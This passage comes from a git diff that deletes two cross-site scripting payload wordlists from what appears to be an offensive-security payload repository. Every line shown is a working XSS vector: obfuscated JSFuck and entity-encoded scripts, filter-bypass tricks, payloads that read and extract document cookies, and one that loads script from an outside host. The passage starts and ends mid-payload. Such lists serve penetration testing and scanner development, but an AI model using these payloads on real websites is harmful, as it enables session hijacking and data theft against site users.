[]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> -<img src=1 alt=al lang=ert onerror=top[alt+lang](0)> -<script>$=1,alert($)</script> -<script ~~~>confirm(1)</script ~~~> -<script>$=1,\u0061lert($)</script> -<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script> -<</script/script><script ~~~>\u0061lert(1)</script ~~~> -</style></scRipt><scRipt>alert(1)</scRipt> -<img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;> -<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)> -<svg><x><script>alert&#40;&#39;1&#39;&#41</x> -<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'> diff --git a/XSS Injection/Intruders/JHADDIX_XSS.txt b/XSS Injection/Intruders/JHADDIX_XSS.txt deleted file mode 100644 index f2032af..0000000 --- a/XSS Injection/Intruders/JHADDIX_XSS.txt +++ /dev/null @@ -1,110 +0,0 @@ -'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E -<<scr\0ipt/src=http://xss.com/xss.js></script -%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E -' onmouseover=alert(/Black.Spook/) -"><iframe%20src="http://google.com"%%203E -'<script>window.onload=function(){document.forms[0].message.value='1';}</script> -x”</title><img src%3dx onerror%3dalert(1)> -<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> -<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> -<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> -<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> -<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> -<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> -<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> -<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> -<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> -<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> -<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> -<script>alert(document.head.innerHTML.substr(146,20));</script> -<script>alert(document.head.childNodes[3].text)</script> -<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> -<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> -<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> -<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> -<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> -<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> -<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> -<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> -<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> -<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> -<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # -<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # -<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># -<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># -<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 -<script for=document event=onreadystatechange>getElementById('safe123').click()</script> -<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> -<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> -<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> -<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> -<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> -<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> -<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># -<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); -<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> -<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> -<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); -<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> -<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); -<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> -<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> -<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); -%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E -<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> -<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E -<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> -<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> -<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); -Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> -<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> -<div onmouseover='alert&lpar;1&rpar;'>DIV</div> -<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> -<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> -<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? -<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? -<var onmouseover="prompt(1)">On Mouse Over</var>? -<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> -<img src="/" =_=" title="onerror='prompt(1)'"> -<%<!--'%><script>alert(1);</script --> -<script src="data:text/javascript,alert(1)"></script> -<iframe/src \/\/onload = prompt(1) -<iframe/onreadystatechange=alert(1) -<svg/onload=alert(1) -<input value=<><iframe/src=javascript:confirm(1) -<input type="text" value=``<div/onmouseover='alert(1)'>X</div> -http://www.<script>alert(1)</script .com -<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? -<svg><script ?>alert(1) -<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> -<img src=`xx:xx`onerror=alert(1)> -<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> -<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? -<math><a xlink:href="//jsfiddle.net/t846h/">click -<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? -<svg contentScriptType=text/vbs><script>MsgBox+1 -<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a -<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> -<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ -<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F -<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? -<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> -<script>+-+-1-+-+alert(1)</script> -<body/onload=&lt;!--&gt;&#10alert(1)> -<script itworksinallbrowsers>/*<script* */alert(1)</script ? -<img src ?itworksonchrome?\/onerror = alert(1)??? -<svg><script>//&NewLine;confirm(1);</script </svg> -<svg><script onlypossibleinopera:-)> alert(1) -<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe -<script x> alert(1) </script 1=2 -<div/onmouseover='alert(1)'> style="x:"> -<--`<img/src=` onerror=alert(1)> --!> -<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? -<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? -"><img src=x onerror=window.open('https://www.google.com/');> -<form><button formaction=javascript&colon;alert(1)>CLICKME -<math><a xlink:href="//jsfiddle.net/t846h/">click -<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? -<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> -<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> -"><img src=x onerror=prompt(1);> diff --git a/XSS Injection/Intruders/MarioXSSVectors.txt b/XSS Injection/Intruders/MarioXSSVectors.txt deleted file mode 100644 index 21a85ee..0000000 --- a/XSS Injection/Intruders/MarioXSSVectors.txt +++ /dev/null @@ -1,330 +0,0 @@ -<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div> -<div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div> -<div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div> -<div id="39"><!-- up to Opera 11.52, FF 3.6.28 --> -<![><img src="]><img src=x onerror=alert(39)//"> - -<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> -<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div> -<div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div> -<div id="41"><li style=list-style:url() onerror=alert(41)></li> -<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div> -<div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div> -<div id="43"><?xml version="1.0" standalone="no"?> -<html xmlns="http://www.w3.org/1999/xhtml"> -<head> -<style type="text/css"> -@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} -</style> -</head> -<body>Hello</body> -</html>//["'`-->]]>]</div> -<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document 